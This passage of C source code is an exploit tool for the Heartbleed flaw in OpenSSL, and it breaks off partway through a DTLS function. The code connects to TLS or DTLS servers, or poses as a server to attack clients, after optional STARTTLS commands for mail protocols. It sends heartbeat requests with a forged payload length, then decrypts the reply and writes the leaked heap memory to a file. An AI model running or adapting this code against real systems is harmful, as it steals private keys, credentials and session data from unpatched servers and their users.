|.@X-.2....d.....|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n* \r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\nconnection* dtls_server(int sd, char* server,int port){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n\tunsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("bind()");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n//\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* dtls_client(int sd, char* server,int port){\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n\tmemset((char *)&sa,0,sizeof(sa));\r\n\tc = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("connect()");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\r\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n\tBIO_ctrl_set_connected(bio, 1, &sa);\r\n\tSSL_set_bio(c->sslHandle, bio, bio);\r\n\tSSL_set_connect_state (c->sslHandle);\r\n//printf("eshta\\n");\r\n if(SSL_connect(c->sslHandle)!=1) \r\n ERR_print_errors_fp(stderr);\r\n\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway), %d \\n",c->sslHandle->tlsext_heartbeat);\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\r\n\tmemset(buf, '\\0', sizeof buf);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n//\t\t\ts2n(0xffff,p);\r\n//\t\t\ts2n(0x3feb,p);\r\n\t\t\ts2n(0x0538,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n\r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n\r\n\tif (ret >= 0)\r\n\t\t{\r\n\t\tif (c->sslHandle->msg_callback)\r\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n\t\t\t\tbuf, 3 + 16,\r\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\r\n\r\n\t\tdtls1_start_timer(c->sslHandle);\r\n\t\tc->sslHandle->tlsext_hb_pending = 1;\r\n\t\t}\r\n\r\n OPENSSL_free(buf);\r\n\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\n\r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n\tDTLS1_BITMAP *bitmap;\r\n\tunsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n\r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n\t\t\tn2s(p,rr->epoch);\r\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\r\n\t\t\tp+=6;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n\r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\t\tif ( n != i)\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length = 0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n\r\n\tbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n\tif ( bitmap == NULL)\r\n\t\t{\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\r\n\t\t !dtls1_record_replay_check(s, bitmap))\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length=0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\r\n\tif (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n\t\t{\r\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n\t\t\t{\r\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n\t\t\t}\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n\torig_len=rr->length;\r\n\r\n dtls1_enc(s,0);\r\n\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n 